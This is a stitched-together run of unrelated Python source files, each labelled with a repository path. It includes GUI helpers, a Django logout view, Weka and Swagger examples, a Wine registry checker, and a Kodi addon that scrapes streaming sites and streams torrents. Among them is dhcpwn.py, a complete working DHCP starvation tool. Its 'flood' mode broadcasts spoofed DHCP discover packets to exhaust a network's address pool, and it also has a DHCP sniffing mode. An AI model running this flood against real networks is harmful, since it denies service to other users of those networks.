Font(font=font) except Exception: print_err(_('invalid font name: ') + font) if DEBUG: traceback.print_exc() else: fa = f.actual() font_name = (fa['family'], fa['size'], fa['slant'], fa['weight']) return font_name def base_init_root_window(root, app): # root.wm_group(root) root.wm_title(TITLE + ' ' + VERSION) root.wm_iconname(TITLE + ' ' + VERSION) # set minsize sw, sh = (root.winfo_screenwidth(), root.winfo_screenheight()) if sw < 640 or sh < 480: root.wm_minsize(400, 300) else: root.wm_minsize(520, 360) if TOOLKIT == 'gtk': pass if TOOLKIT == 'kivy': pass elif USE_TILE: theme = app.opt.tile_theme init_tile(app, root) set_theme(app, root, theme) else: pass class BaseTkSettings: canvas_padding = (0, 0) horizontal_toolbar_padding = (0, 0) vertical_toolbar_padding = (0, 1) toolbar_button_padding = (2, 2) toolbar_label_padding = (4, 4) if USE_TILE: toolbar_relief = 'flat' toolbar_borderwidth = 0 else: toolbar_relief = 'raised' toolbar_button_relief = 'flat' toolbar_separator_relief = 'sunken' toolbar_borderwidth = 1 toolbar_button_borderwidth = 1
vbeffara/Simulations
tools/massage-box.py
#! /usr/bin/env python import sys g = {} n = {} for line in sys.stdin: (n1, n2, p, q, t, tg, x) = line.strip().split(' ') t = int(t) x = float(x) key = ' '.join((n1,n2,p,q)) if not key in n: n[key] = 0 g[key] = 0 n[key] += t g[key] += x*t for key in n: print key, n[key], g[key]/n[key]
CroceRossaItaliana/jorvik
autenticazione/viste.py
# -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, unicode_literals from django.contrib.auth import REDIRECT_FIELD_NAME from django.shortcuts import redirect from django.contrib.auth.views import logout as original_logout from loginas import settings as la_settings from loginas.utils import restore_original_login def logout(request, next_page=None, template_name='registration/logged_out.html', redirect_field_name=REDIRECT_FIELD_NAME, extra_context=None): """ This can replace your default logout view. In you settings, do: from django.core.urlresolvers import reverse_lazy LOGOUT_URL = reverse_lazy('logout') """ original_session = request.session.get(la_settings.USER_SESSION_FLAG) if original_session: restore_original_login(request) return redirect(la_settings.LOGOUT_REDIRECT) else: return original_logout(request, next_page, template_name, redirect_field_name, extra_context)
fracpete/python-weka-wrapper-examples
src/wekaexamples/flow/list_file.py
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # list_files.py # Copyright (C) 2015 Fracpete (pythonwekawrapper at gmail dot com) import traceback import tempfile import weka.core.jvm as jvm from weka.flow.control import Flow from weka.flow.source import ListFiles from weka.flow.sink import Console def main(): """ Just runs some example code. """ # setup the flow flow = Flow(name="list files") # flow.print_help() listfiles = ListFiles() listfiles.config["dir"] = str(tempfile.gettempdir()) listfiles.config["list_files"] = True listfiles.config["list_dirs"] = False listfiles.config["recursive"] = False listfiles.config["regexp"] = ".*r.*" # listfiles.print_help() flow.actors.append(listfiles) console = Console() console.config["prefix"] = "Match: " # console.print_help() flow.actors.append(console) # run the flow msg = flow.setup() if msg is None: print("\n" + flow.tree + "\n") msg = flow.execute() if msg is not None: print("Error executing flow:\n" + msg) else: print("Error setting up flow:\n" + msg) flow.wrapup() flow.cleanup() if __name__ == "__main__": try: jvm.start() main() except Exception, e: print(traceback.format_exc()) finally: jvm.stop()
FireBladeNooT/Medusa_1_6
lib/tvdbapiv2/models/series_actors.py
# coding: utf-8 """ Copyright 2015 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Ref: https://github.com/swagger-api/swagger-codegen """ from pprint import pformat from six import iteritems class SeriesActors(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ def __init__(self): """ SeriesActors - a model defined in Swagger :param dict swaggerTypes: The key is attribute name and the value is attribute type. :param dict attributeMap: The key is attribute name and the value is json key in definition. """ self.swagger_types = { 'data': 'list[SeriesActorsData]' } self.attribute_map = { 'data': 'data' } self._data = None @property def data(self): """ Gets the data of this SeriesActors. :return: The data of this SeriesActors. :rtype: list[SeriesActorsData] """ return self._data @data.setter def data(self, data): """ Sets the data of this SeriesActors. :param data: The data of this SeriesActors. :type: list[SeriesActorsData] """ self._data = data def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
RobLoach/lutris
tests/check_prefixes.py
#!/usr/bin/python3 import os import sys import subprocess sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from lutris.util.wineregistry import WineRegistry PREFIXES_PATH = os.path.expanduser("~/Games/wine/prefixes") def get_registries(): registries = [] directories = os.listdir(PREFIXES_PATH) directories.append(os.path.expanduser("~/.wine")) for prefix in directories: for path in os.listdir(os.path.join(PREFIXES_PATH, prefix)): if path.endswith(".reg"): registries.append(os.path.join(PREFIXES_PATH, prefix, path)) return registries def check_registry(registry_path): with open(registry_path, 'r') as registry_file: original_content = registry_file.read() try: registry = WineRegistry(registry_path) except: sys.stderr.write("Error parsing {}\n".format(registry_path)) raise content = registry.render() if content != original_content: wrong_path = os.path.join(os.path.dirname(__file__), 'error.reg') with open(wrong_path, 'w') as wrong_reg: wrong_reg.write(content) print("Content of parsed registry doesn't match: {}".format(registry_path)) subprocess.call(["meld", registry_path, wrong_path]) sys.exit(2) registries = get_registries() for registry in registries: check_registry(registry) print("All {} registry files validated!".format(len(registries)))
pitunti/alfaPitunti
plugin.video.alfa/channels/anitoonstv.py
# -*- coding: utf-8 -*- import re from channels import renumbertools from channelselector import get_thumb from core import httptools from core import scrapertools from core import servertools from core import tmdb from core.item import Item from platformcode import config, logger from channels import autoplay IDIOMAS = {'latino': 'Latino'} list_language = IDIOMAS.values() list_servers = ['openload', 'okru', 'netutv', 'rapidvideo' ] list_quality = ['default'] host = "http://www.anitoonstv.com" def mainlist(item): logger.info() thumb_series = get_thumb("channels_tvshow.png") autoplay.init(item.channel, list_servers, list_quality) itemlist = list() itemlist.append(Item(channel=item.channel, action="lista", title="Anime", url=host, thumbnail=thumb_series)) itemlist.append(Item(channel=item.channel, action="lista", title="Series Animadas", url=host, thumbnail=thumb_series)) itemlist.append(Item(channel=item.channel, action="lista", title="Novedades", url=host, thumbnail=thumb_series)) itemlist.append(Item(channel=item.channel, action="lista", title="Pokemon", url=host, thumbnail=thumb_series)) itemlist = renumbertools.show_option(item.channel, itemlist) autoplay.show_option(item.channel, itemlist) return itemlist def lista(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|\s{2}|&nbsp;", "", data) if 'Novedades' in item.title: patron_cat = '<div class="activos"><h3>(.+?)<\/h2><\/a><\/div>' patron = '<a href="(.+?)"><h2><span>(.+?)<\/span>' else: patron_cat = '<li><a href=.+?>' patron_cat += str(item.title) patron_cat += '<\/a><div>(.+?)<\/div><\/li>' patron = "<a href='(.+?)'>(.+?)<\/a>" data = scrapertools.find_single_match(data, patron_cat) matches = scrapertools.find_multiple_matches(data, patron) for link, name in matches: if "Novedades" in item.title: url = link title = name.capitalize() else: url = host + link title = name if ":" in title: cad = title.split(":") show = cad[0] else: if "(" in title: cad = title.split("(") if "Super" in title: show = cad[1] show = show.replace(")", "") else: show = cad[0] else: show = title if "&" in show: cad = title.split("xy") show = cad[0] context1=[renumbertools.context(item), autoplay.context] itemlist.append( item.clone(title=title, url=url, plot=show, action="episodios", show=show, context=context1)) tmdb.set_infoLabels(itemlist) return itemlist def episodios(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|\s{2}|&nbsp;", "", data) patron = '<div class="pagina">(.+?)<\/div><div id="fade".+?>' data = scrapertools.find_single_match(data, patron) patron_caps = "<a href='(.+?)'>Capitulo: (.+?) - (.+?)<\/a>" matches = scrapertools.find_multiple_matches(data, patron_caps) show = scrapertools.find_single_match(data, '<span>Titulo.+?<\/span>(.+?)<br><span>') scrapedthumbnail = scrapertools.find_single_match(data, "<img src='(.+?)'.+?>") scrapedplot = scrapertools.find_single_match(data, '<span>Descripcion.+?<\/span>(.+?)<br>') i = 0 temp = 0 for link, cap, name in matches: if int(cap) == 1: temp = temp + 1 if int(cap) < 10: cap = "0" + cap season = temp episode = int(cap) season, episode = renumbertools.numbered_for_tratk( item.channel, item.show, season, episode) date = name title = "%sx%s %s (%s)" % (season, str(episode).zfill(2), "Episodio %s" % episode, date) # title = str(temp)+"x"+cap+" "+name url = host + "/" + link if "NO DISPONIBLE" not in name: itemlist.append(Item(channel=item.channel, action="findvideos", title=title, thumbnail=scrapedthumbnail, plot=scrapedplot, url=url, show=show)) if config.get_videolibrary_support() and len(itemlist) > 0: itemlist.append(Item(channel=item.channel, title="Añadir esta serie a la videoteca", url=item.url, action="add_serie_to_library", extra="episodios", show=show)) return itemlist def findvideos(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data1 = re.sub(r"\n|\r|\t|\s{2}|&nbsp;", "", data) data_vid = scrapertools.find_single_match(data1, '<div class="videos">(.+?)<\/div><div .+?>') # name = scrapertools.find_single_match(data,'<span>Titulo.+?<\/span>([^<]+)<br>') scrapedplot = scrapertools.find_single_match(data, '<br><span>Descrip.+?<\/span>([^<]+)<br>') scrapedthumbnail = scrapertools.find_single_match(data, '<div class="caracteristicas"><img src="([^<]+)">') itemla = scrapertools.find_multiple_matches(data_vid, '<div class="serv">.+?-(.+?)-(.+?)<\/div><.+? src="(.+?)"') for server, quality, url in itemla: if "Calidad Alta" in quality: quality = quality.replace("Calidad Alta", "HQ") server = server.lower().strip() if "ok" == server: server = 'okru' if "netu" == server: continue itemlist.append(item.clone(url=url, action="play", server=server, contentQuality=quality, thumbnail=scrapedthumbnail, plot=scrapedplot, title="Enlace encontrado en %s: [%s]" % (server.capitalize(), quality))) autoplay.start(itemlist, item) return itemlist def play(item): logger.info() itemlist = [] # Buscamos video por servidor ... devuelve = servertools.findvideosbyserver(item.url, item.server) if not devuelve: # ...sino lo encontramos buscamos en todos los servidores disponibles devuelve = servertools.findvideos(item.url, skip=True) if devuelve: # logger.debug(devuelve) itemlist.append(Item(channel=item.channel, title=item.contentTitle, action="play", server=devuelve[0][2], url=devuelve[0][1], thumbnail=item.thumbnail)) return itemlist
mschwager/dhcpwn
dhcpwn.py
#!/usr/bin/env python3 import argparse import logging import string # Quiet scapy logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy import volatile # noqa: E402 from scapy import sendrecv # noqa: E402 from scapy import config # noqa: E402 from scapy.layers import l2 # noqa: E402 from scapy.layers import inet # noqa: E402 from scapy.layers import dhcp # noqa: E402 # Configuration requires these imports to properly initialize from scapy import route # noqa: E402, F401 from scapy import route6 # noqa: E402, F401 def dhcp_flood(**kwargs): iface = kwargs["interface"] count = kwargs["count"] unique_hexdigits = str.encode("".join(set(string.hexdigits.lower()))) packet = ( l2.Ether(dst="ff:ff:ff:ff:ff:ff") / inet.IP(src="0.0.0.0", dst="255.255.255.255") / inet.UDP(sport=68, dport=67) / dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) / dhcp.DHCP(options=[("message-type", "discover"), "end"]) ) sendrecv.sendp( packet, iface=iface, count=count ) def print_dhcp_response(response): print("Source: {}".format(response[l2.Ether].src)) print("Destination: {}".format(response[l2.Ether].dst)) for option in response[dhcp.DHCP].options: if isinstance(option, tuple): option, *values = option else: # For some reason some options are strings instead of tuples option, *values = option, None if option in ["end", "pad"]: break output = "Option: {} -> {}".format(option, values) if option == "message-type" and len(values) == 1: dhcp_type = dhcp.DHCPTypes.get(values[0], "unknown") output = "{} ({})".format(output, dhcp_type) print(output) def dhcp_sniff(**kwargs): sendrecv.sniff(filter="udp and (port 67 or 68)", prn=print_dhcp_response) def parse_args(): p = argparse.ArgumentParser(description=''' All your IPs are belong to us. ''', formatter_class=argparse.RawTextHelpFormatter) p.add_argument( '-i', '--interface', action='store', default=config.conf.iface, help='network interface to use' ) subparsers = p.add_subparsers(dest='command') subparsers.required = True flood = subparsers.add_parser('flood') flood.add_argument( '-c', '--count', action='store', default=10, type=int, help='number of addresses to consume' ) subparsers.add_parser('sniff') args = p.parse_args() return args def main(): args = parse_args() dispatch = { "flood": dhcp_flood, "sniff": dhcp_sniff, } dispatch[args.command](**vars(args)) if __name__ == "__main__": main()
alfa-jor/addon
plugin.video.alfa/lib/btserver/client.py
# -*- coding: utf-8 -*- import os import pickle import random import time import urllib try: import xbmc, xbmcgui except: pass from platformcode import config, logger LIBTORRENT_PATH = config.get_setting("libtorrent_path", server="torrent", default='') from servers import torrent as torr lt, e, e1, e2 = torr.import_libtorrent(LIBTORRENT_PATH) from cache import Cache from dispatcher import Dispatcher from file import File from handler import Handler from monitor import Monitor from resume_data import ResumeData from server import Server try: BUFFER = int(config.get_setting("bt_buffer", server="torrent", default="50")) except: BUFFER = 50 config.set_setting("bt_buffer", "50", server="torrent") DOWNLOAD_PATH = config.get_setting("bt_download_path", server="torrent", default=config.get_setting("downloadpath")) BACKGROUND = config.get_setting("mct_background_download", server="torrent", default=True) RAR = config.get_setting("mct_rar_unpack", server="torrent", default=True) msg_header = 'Alfa BT Cliente Torrent' class Client(object): INITIAL_TRACKERS = ['udp://tracker.openbittorrent.com:80', 'udp://tracker.istole.it:80', 'udp://open.demonii.com:80', 'udp://tracker.coppersurfer.tk:80', 'udp://tracker.leechers-paradise.org:6969', 'udp://exodus.desync.com:6969', 'udp://tracker.publicbt.com:80', 'http://tracker.torrentbay.to:6969/announce', 'http://tracker.pow7.com/announce', 'udp://tracker.ccc.de:80/announce', 'udp://open.demonii.com:1337', 'http://9.rarbg.com:2710/announce', 'http://bt.careland.com.cn:6969/announce', 'http://explodie.org:6969/announce', 'http://mgtracker.org:2710/announce', 'http://tracker.best-torrents.net:6969/announce', 'http://tracker.tfile.me/announce', 'http://tracker1.wasabii.com.tw:6969/announce', 'udp://9.rarbg.com:2710/announce', 'udp://9.rarbg.me:2710/announce', 'udp://coppersurfer.tk:6969/announce', 'http://www.spanishtracker.com:2710/announce', 'http://www.todotorrents.com:2710/announce' ] ### Added some trackers from MCT VIDEO_EXTS = {'.avi': 'video/x-msvideo', '.mp4': 'video/mp4', '.mkv': 'video/x-matroska', '.m4v': 'video/mp4', '.mov': 'video/quicktime', '.mpg': 'video/mpeg', '.ogv': 'video/ogg', '.ogg': 'video/ogg', '.webm': 'video/webm', '.ts': 'video/mp2t', '.3gp': 'video/3gpp', '.rar': 'video/unrar'} def __init__(self, url=None, port=None, ip=None, auto_shutdown=True, wait_time=20, timeout=5, auto_delete=True, temp_path=None, is_playing_fnc=None, print_status=False): # server if port: self.port = port else: self.port = random.randint(8000, 8099) if ip: self.ip = ip else: self.ip = "127.0.0.1" self.server = Server((self.ip, self.port), Handler, client=self) # Options if temp_path: self.temp_path = temp_path else: self.temp_path = DOWNLOAD_PATH self.is_playing_fnc = is_playing_fnc self.timeout = timeout self.auto_delete = auto_delete self.wait_time = wait_time self.auto_shutdown = auto_shutdown self.buffer_size = BUFFER self.first_pieces_priorize = BUFFER self.last_pieces_priorize = 5 self.state_file = "state" try: self.torrent_paramss = {'save_path': self.temp_path, 'storage_mode': lt.storage_mode_t.storage_mode_allocate} except Exception, e: try: do = xbmcgui.Dialog() e = e1 or e2 do.ok('ERROR en el cliente BT Libtorrent', 'Módulo no encontrado o imcompatible con el dispositivo.', 'Reporte el fallo adjuntando un "log".', str(e)) except: pass return # State self.has_meta = False self.meta = None self.start_time = None self.last_connect = 0 self.connected = False self.closed = False self.file = None self.files = None self._th = None self.seleccion = 0 self.index = 0 # Sesion self._cache = Cache(self.temp_path) self._ses = lt.session() #self._ses.listen_on(0, 0) ### ALFA: it blocks repro of some .torrents # Cargamos el archivo de estado (si existe) """ ### ALFA: it blocks repro of some .torrents if os.path.exists(os.path.join(self.temp_path, self.state_file)): try: f = open(os.path.join(self.temp_path, self.state_file), "rb") state = pickle.load(f) self._ses.load_state(state) f.close() except: pass """ self._start_services() # Monitor & Dispatcher self._monitor = Monitor(self) if print_status: self._monitor.add_listener(self.print_status) self._monitor.add_listener(self._check_meta) self._monitor.add_listener(self.save_state) self._monitor.add_listener(self.priorize_start_file) self._monitor.add_listener(self.announce_torrent) if self.auto_shutdown: self._monitor.add_listener(self._auto_shutdown) self._dispatcher = Dispatcher(self) self._dispatcher.add_listener(self._update_ready_pieces) # Iniciamos la URL if url: self.start_url(url) def set_speed_limits(self, download=0, upload=0): """ Función encargada de poner límites a la velocidad de descarga o subida """ if isinstance(download, int) and download > 0: self._th.set_download_limit(download * 1024) if isinstance(upload, int) and download > 0: self._th.set_upload_limit(upload * 1024) def get_play_list(self): """ Función encargada de generar el playlist """ # Esperamos a lo metadatos while not self.has_meta: time.sleep(1) # Comprobamos que haya archivos de video if self.files: if len(self.files) > 1: return "http://" + self.ip + ":" + str(self.port) + "/playlist.pls" else: return "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(self.files[0].path) def get_files(self): """ Función encargada de genera el listado de archivos """ # Esperamos a lo metadatos while not self.has_meta: time.sleep(1) files = [] # Comprobamos que haya archivos de video if self.files: # Creamos el dict con los archivos for file in self.files: n = file.path u = "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(n) s = file.size files.append({"name": n, "url": u, "size": s}) return files def _find_files(self, files, search=None): """ Función encargada de buscar los archivos reproducibles del torrent """ self.total_size = 0 # Obtenemos los archivos que la extension este en la lista videos = filter(lambda f: self.VIDEO_EXTS.has_key(os.path.splitext(f.path)[1]), files) if not videos: raise Exception('No video files in torrent') for v in videos: self.total_size += v.size ### ALFA videos[videos.index(v)].index = files.index(v) return videos def set_file(self, f): """ Función encargada de seleccionar el archivo que vamos a servir y por tanto, priorizar su descarga """ # Seleccionamos el archivo que vamos a servir fmap = self.meta.map_file(f.index, 0, 1) self.file = File(f.path, self.temp_path, f.index, f.size, fmap, self.meta.piece_length(), self) if self.seleccion < 0: ### ALFA self.file.first_piece = 0 ### ALFA self.file.last_piece = self.meta.num_pieces() ### ALFA self.file.size = self.total_size ### ALFA self.prioritize_file() def prioritize_piece(self, pc, idx): """ Función encargada de priorizar una determinada pieza """ piece_duration = 1000 min_deadline = 2000 dl = idx * piece_duration + min_deadline """ ### ALFA try: self._th.set_piece_deadline(pc, dl, lt.deadline_flags.alert_when_available) except: pass """ if idx == 0: tail_pieces = 9 # Piezas anteriores a la primera se desactivan if (self.file.last_piece - pc) > tail_pieces: for i in xrange(self.file.first_piece, pc): self._th.piece_priority(i, 0) self._th.reset_piece_deadline(i) # Piezas siguientes a la primera se activan for i in xrange(pc + 1, self.file.last_piece + 1): #self._th.piece_priority(i, 0) self._th.piece_priority(i, 1) def prioritize_file(self): """ Función encargada de priorizar las piezas correspondientes al archivo seleccionado en la funcion set_file() """ priorities = [] for i in xrange(self.meta.num_pieces()): if i >= self.file.first_piece and i <= self.file.last_piece: priorities.append(1) else: if self.index < 0: priorities.append(1) ### ALFA else: priorities.append(0) ### ALFA self._th.prioritize_pieces(priorities) x = 0 for i, _set in enumerate(self._th.piece_priorities()): if _set > 0: x += 1 #logger.info("***** Nº Pieza: %s: %s" % (i, str(_set))) logger.info("***** Piezas %s : Activas: %s" % (str(i+1), str(x))) logger.info("***** first_piece %s : last_piece: %s" % (str(self.file.first_piece), str(self.file.last_piece))) def download_torrent(self, url): """ Función encargada de descargar un archivo .torrent """ from core import httptools data = httptools.downloadpage(url).data return data def start_url(self, uri): """ Función encargada iniciar la descarga del torrent desde la url, permite: - Url apuntando a un .torrent - Url magnet - Archivo .torrent local """ if self._th: raise Exception('Torrent is already started') if uri.startswith('http://') or uri.startswith('https://'): torrent_data = self.download_torrent(uri) info = lt.torrent_info(lt.bdecode(torrent_data)) tp = {'ti': info} resume_data = self._cache.get_resume(info_hash=str(info.info_hash())) if resume_data: tp['resume_data'] = resume_data elif uri.startswith('magnet:'): tp = {'url': uri} resume_data = self._cache.get_resume(info_hash=Cache.hash_from_magnet(uri)) if resume_data: tp['resume_data'] = resume_data elif os.path.isfile(uri): if os.access(uri, os.R_OK): info = lt.torrent_info(uri) tp = {'ti': info} resume_data = self._cache.get_resume(info_hash=str(info.info_hash())) if resume_data: tp['resume_data'] = resume_data else: raise ValueError('Invalid torrent path %s' % uri) else: raise ValueError("Invalid torrent %s" % uri) tp.update(self.torrent_paramss) self._th = self._ses.add_torrent(tp) for tr in self.INITIAL_TRACKERS: self._th.add_tracker({'url': tr}) self._th.set_sequential_download(True) self._th.force_reannounce() self._th.force_dht_announce() self._monitor.start() self._dispatcher.do_start(self._th, self._ses) self.server.run() def stop(self): """ Función encargada de de detener el torrent y salir """ self._dispatcher.stop() self._dispatcher.join() self._monitor.stop() self.server.stop() self._dispatcher.stop() if self._ses: self._ses.pause() if self._th: self.save_resume() self.save_state() self._stop_services() self._ses.remove_torrent(self._th, self.auto_delete) del self._ses self.closed = True def pause(self): """ Función encargada de de pausar el torrent """ self._ses.pause() def _start_services(self): """ Función encargada de iniciar los servicios de libtorrent: dht, lsd, upnp, natpnp """ self._ses.add_dht_router("router.bittorrent.com", 6881) self._ses.add_dht_router("router.bitcomet.com", 554) self._ses.add_dht_router("router.utorrent.com", 6881) self._ses.add_dht_router("dht.transmissionbt.com",6881) ### from MCT self._ses.start_dht() self._ses.start_lsd() self._ses.start_upnp() self._ses.start_natpmp() def _stop_services(self): """ Función encargada de detener los servicios de libtorrent: dht, lsd, upnp, natpnp """ self._ses.stop_natpmp() self._ses.stop_upnp() self._ses.stop_lsd() self._ses.stop_dht() def save_resume(self): """ Función encargada guardar los metadatos para continuar una descarga mas rapidamente """ if self._th.need_save_resume_data() and self._th.is_valid() and self.meta: r = ResumeData(self) start = time.time() while (time.time() - start) <= 5: if r.data or r.failed: break time.sleep(0.1) if r.data: self._cache.save_resume(self.unique_file_id, lt.bencode(r.data)) @property def status(self): """ Función encargada de devolver el estado del torrent """ if self._th: s = self._th.status() # Download Rate s._download_rate = s.download_rate / 1024 # Progreso del archivo if self.file: pieces = s.pieces[self.file.first_piece:self.file.last_piece] ### ALFA progress = float(sum(pieces)) / len(pieces) s.pieces_len = len(pieces) ### ALFA s.pieces_sum = sum(pieces) ### ALFA #logger.info('***** Estado piezas: %s' % pieces) else: progress = 0 s.pieces_len = 0 ### ALFA s.pieces_sum = 0 ### ALFA s.progress_file = progress * 100 # Tamaño del archivo s.file_name = '' ### ALFA s.seleccion = '' ### ALFA if self.file: s.seleccion = self.seleccion ### ALFA s.file_name = self.file.path ### ALFA s.file_size = self.file.size / 1048576.0 else: s.file_size = 0 # Estado del buffer if self.file and self.file.cursor: # Con una conexion activa: Disponible vs Posicion del reproductor percent = len(self.file.cursor.cache) percent = percent * 100 / self.buffer_size s.buffer = int(percent) elif self.file: # Sin una conexion activa: Pre-buffer antes de iniciar # El Pre-buffer consta de dos partes_ # 1. Buffer al inicio del archivo para que el reproductor empieze sin cortes # 2. Buffer al final del archivo (en algunos archivos el reproductor mira el final del archivo antes de comenzar) bp = [] # El tamaño del buffer de inicio es el tamaño del buffer menos el tamaño del buffer del final first_pieces_priorize = self.buffer_size - self.last_pieces_priorize # Comprobamos qué partes del buffer del inicio estan disponibles for x in range(first_pieces_priorize): if self._th.have_piece(self.file.first_piece + x): bp.append(True) else: bp.append(False) # Comprobamos qué partes del buffer del final estan disponibles for x in range(self.last_pieces_priorize): if self._th.have_piece(self.file.last_piece - x): bp.append(True) else: bp.append(False) s.buffer = int(sum(bp) * 100 / self.buffer_size) else: # Si no hay ningun archivo seleccionado: No hay buffer s.buffer = 0 # Tiempo restante para cerrar en caso de tener el timeout activo if self.auto_shutdown: if self.connected: if self.timeout: s.timeout = int(self.timeout - (time.time() - self.last_connect - 1)) if self.file and self.file.cursor: s.timeout = self.timeout if s.timeout < 0: s.timeout = "Cerrando" else: s.timeout = "---" else: if self.start_time and self.wait_time: s.timeout = int(self.wait_time - (time.time() - self.start_time - 1)) if s.timeout < 0: s.timeout = "Cerrando" else: s.timeout = "---" else: s.timeout = "Off" # Estado de la descarga STATE_STR = ['En cola', 'Comprobando', 'Descargando metadata', \ 'Descargando', 'Finalizado', 'Seeding', 'Allocating', 'Comprobando fastresume'] s.str_state = STATE_STR[s.state] # Estado DHT if self._ses.dht_state() is not None: s.dht_state = "On" s.dht_nodes = self._ses.status().dht_nodes else: s.dht_state = "Off" s.dht_nodes = 0 # Cantidad de Trackers s.trackers = len(self._th.trackers()) # Origen de los peers s.dht_peers = 0 s.trk_peers = 0 s.pex_peers = 0 s.lsd_peers = 0 for peer in self._th.get_peer_info(): if peer.source & 1: s.trk_peers += 1 if peer.source & 2: s.dht_peers += 1 if peer.source & 4: s.pex_peers += 1 if peer.source & 8: s.lsd_peers += 1 return s """ Servicios: - Estas funciones se ejecutan de forma automatica cada x tiempo en otro Thread. - Estas funciones son ejecutadas mientras el torrent esta activo algunas pueden desactivarse segun la configuracion como por ejemplo la escritura en el log """ def _auto_shutdown(self, *args, **kwargs): """ Servicio encargado de autoapagar el servidor """ if self.file and self.file.cursor: self.last_connect = time.time() self.connected = True if self.is_playing_fnc and self.is_playing_fnc(): self.last_connect = time.time() self.connected = True if self.auto_shutdown: # shudown por haber cerrado el reproductor if self.connected and self.is_playing_fnc and not self.is_playing_fnc(): if time.time() - self.last_connect - 1 > self.timeout: self.stop() # shutdown por no realizar ninguna conexion if (not self.file or not self.file.cursor) and self.start_time and self.wait_time and not self.connected: if time.time() - self.start_time - 1 > self.wait_time: self.stop() # shutdown tras la ultima conexion if (not self.file or not self.file.cursor) and self.timeout and self.connected and not self.is_playing_fnc: if time.time() - self.last_connect - 1 > self.timeout: self.stop() def announce_torrent(self): """ Servicio encargado de anunciar el torrent """ self._th.force_reannounce() self._th.force_dht_announce() def save_state(self): """ Servicio encargado de guardar el estado """ state = self._ses.save_state() f = open(os.path.join(self.temp_path, self.state_file), 'wb') pickle.dump(state, f) f.close() def _update_ready_pieces(self, alert_type, alert): """ Servicio encargado de informar que hay una pieza disponible """ if alert_type == 'read_piece_alert' and self.file: self.file.update_piece(alert.piece, alert.buffer) def _check_meta(self): """ Servicio encargado de comprobar si los metadatos se han descargado """ if self.status.state >= 3 and self.status.state <= 5 and not self.has_meta: # Guardamos los metadatos self.meta = self._th.get_torrent_info() # Obtenemos la lista de archivos del meta fs = self.meta.files() if isinstance(fs, list): files = fs else: files = [fs.at(i) for i in xrange(fs.num_files())] # Guardamos la lista de archivos self.files = self._find_files(files) # Si hay varios vídeos (no RAR), se selecciona el vídeo o "todos" lista = [] seleccion = 0 for file in self.files: if '.rar' in str(file.path): seleccion = -9 lista += [os.path.split(str(file.path))[1]] if len(lista) > 1 and seleccion >= 0: d = xbmcgui.Dialog() seleccion = d.select(msg_header + ": Selecciona el vídeo, o 'Cancelar' para todos", lista) if seleccion < 0: index = 0 self.index = seleccion else: index = seleccion self.index = self.files[index].index self.seleccion = seleccion # Marcamos el primer archivo como activo self.set_file(self.files[index]) # Damos por iniciada la descarga self.start_time = time.time() # Guardamos el .torrent en el cache self._cache.file_complete(self._th.get_torrent_info()) self.has_meta = True def priorize_start_file(self): ''' Servicio encargado de priorizar el principio y final de archivo cuando no hay conexion ''' if self.file and not self.file.cursor: num_start_pieces = self.buffer_size - self.last_pieces_priorize # Cantidad de piezas a priorizar al inicio num_end_pieces = self.last_pieces_priorize # Cantidad de piezas a priorizar al final pieces_count = 0 # Priorizamos las ultimas piezas for y in range(self.file.last_piece - num_end_pieces, self.file.last_piece + 1): if not self._th.have_piece(y): self.prioritize_piece(y, pieces_count) pieces_count += 1 # Priorizamos las primeras piezas for y in range(self.file.first_piece, self.file.last_piece + 1): if not self._th.have_piece(y): if pieces_count == self.buffer_size: break self.prioritize_piece(y, pieces_count) pieces_count += 1 def print_status(self): ''' Servicio encargado de mostrar en el log el estado de la descarga ''' s = self.status ### ALFA if self.seleccion >= 0: archivo = self.seleccion + 1 else: archivo = self.seleccion logger.info( '%.2f%% de %.1fMB %s | %.1f kB/s | #%s %d%% | AutoClose: %s | S: %d(%d) P: %d(%d)) | TRK: %d DHT: %d PEX: %d LSD %d | DHT:%s (%d) | Trakers: %d | Pieces: %d (%d)' % \ (s.progress_file, s.file_size, s.str_state, s._download_rate, archivo, s.buffer, s.timeout, s.num_seeds, \ s.num_complete, s.num_peers, s.num_incomplete, s.trk_peers, s.dht_peers, s.pex_peers, s.lsd_peers, s.dht_state, s.dht_nodes, s.trackers, s.pieces_sum, s.pieces_len)) ### ALFA
a-krebs/finances
finances/django_registration/urls.py
